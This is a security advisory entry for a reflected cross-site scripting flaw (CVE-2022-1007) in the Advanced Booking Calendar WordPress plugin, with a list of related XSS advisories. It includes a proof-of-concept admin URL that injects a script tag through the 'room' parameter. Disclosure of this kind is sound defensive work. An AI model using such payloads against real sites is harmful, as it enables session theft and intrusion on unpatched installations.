Advanced Booking Calendar < 1.7.1 – Reflected Cross-Site Scripting | CVE 2022-1007 | Plugin Vulnerabilities

Description

The plugin does not sanitise and escape the room parameter before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting issue

Proof of Concept

https://example.com/wp-admin/admin.php?page=advanced-booking-calendar-show-seasons-calendars&setting=changeSaved&room=1111%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E%3C%22

Affects Plugins

advanced-booking-calendar

Fixed in 1.7.1

References

CVE

URL

https://plugins.trac.wordpress.org/changeset/2695427

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

YICHENG LIU-ZTE CHENFENG lab

Submitter

YICHENG LIU-ZTE CHENFENG lab

Verified

Yes

WPVDB ID

6f5b764b-d13b-4371-9cc5-91204d9d6358

Timeline

Publicly Published

2022-03-21 (about 2 years ago)

Added

2022-03-21 (about 2 years ago)

Last Updated

2022-04-11 (about 2 years ago)

Other

Published

Title

Published

2023-11-21

Title

Perfmatters < 2.2.0 - Authenticated (Subscriber+) Stored Cross-Site Scripting

Published

2023-01-31

Title

Wufoo Shortcode < 1.52 - Contributor+ Stored XSS via Shortcode

Published

2021-10-15

Title

JobBoardWP < 1.1.0 - Admin+ Stored Cross-Site Scripting

Published

2022-04-05

Title

Advanced Page Visit Counter < 6.1.2 - Unauthenticated Stored Cross-Site Scripting

Published

2024-03-13

Title

Crisp < 0.45 - Authenticated (Subscriber+) Stored Cross-Site Scripting